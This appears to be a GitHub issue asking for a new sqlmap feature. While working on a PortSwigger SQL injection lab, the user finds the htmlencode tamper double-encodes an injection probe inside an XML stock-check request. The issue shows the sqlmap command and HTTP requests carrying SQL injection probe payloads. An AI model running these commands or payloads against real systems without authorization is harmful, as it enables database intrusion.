Sqlmap requires parameters to control the running time of the tamper

When I run sqlmap on portswigger's sql injection lab I found sqlmap requires parameters to control the running time of the tamper:
https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding

My sqlmap command:
```
sqlmap --batch --tamper htmlencode --force-ssl -v6 -r 1.request
```

sqlmap sends requests like:
```
POST /product/stock HTTP/1.1
Host: xxx.web-security-academy.net
Cookie: session=xxx
Content-length: 164

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1&amp;#39;TFsWsa&amp;#60;&amp;#39;&amp;#34;&amp;#62;qCHJXH</productId><storeId>1</storeId></stockCheck>
```

but what I expect is:
```
POST /product/stock HTTP/1.1
Host: xxx.web-security-academy.net
Cookie: session=xxx
Content-length: 164

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1&#39;TFsWsa&#60;&#39;&#34;&#62;qCHJXH</productId><storeId>1</storeId></stockCheck>
```

Can we add a parameter to make the tamper execute after xml encoding?

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Sqlmap requires parameters to control the running time of the tamper #5203

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

Sqlmap requires parameters to control the running time of the tamper #5203

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions